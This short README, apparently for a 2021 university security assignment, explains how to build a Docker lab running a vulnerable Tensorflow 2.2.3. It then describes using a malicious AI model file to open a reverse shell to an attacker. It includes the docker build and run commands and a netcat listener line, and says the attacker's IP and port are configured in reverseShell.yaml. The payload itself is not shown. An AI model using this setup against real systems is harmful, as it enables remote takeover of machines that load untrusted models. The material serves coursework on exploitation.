
TP أمن الحاسوب UTN FRBA 2021
لاستغلال الثغرة، من الضروري تشغيل حاوية docker ببيئة مُعدَّة لرفع Tensorflow بإصدار 2.2.3 الذي لا يزال يحتوي على الثغرة. تتكون من:
تحقق مما إذا كان الجهاز يحتوي على docker عن طريق تشغيل:
docker -v
بمجرد أن يحتوي نظام التشغيل لدينا على docker مثبتًا، قم بتشغيل الأوامر التالية في المجلد الجذر لهذا المستودع لبناء التطبيق وتشغيله:
docker-compose build
docker-compose up
أو بدلاً من ذلك، للتشغيل بدون docker compose:
docker build -t docker-exploit-tensorflow-vulnerability:1.0 . # para construir la imagen
docker run --add-host=host.docker.internal:host-gateway --name exploit-tensorflow-vulnerability docker-exploit-tensorflow-vulnerability:1.0 # para crear y lanzar el proceso por primera vez
docker start -a exploit-tensorflow-vulnerability # para lanzar el proceso nuevamente
لكي يعمل الـ reverse shell، يجب تثبيت netcat على جهاز المهاجم، وفتح منفذ استماع لجلسة ssh. مثال:
nc -lvp 10000
ثم، سيتم استغلال الثغرة من خلال نموذج ذكاء اصطناعي خبيث، حيث سنقوم بتشغيل الاتصال بالمهاجم. يجب تكوين عنوان IP ومنفذ الاستماع الخاص بالمهاجم في الملف reverseShell.yaml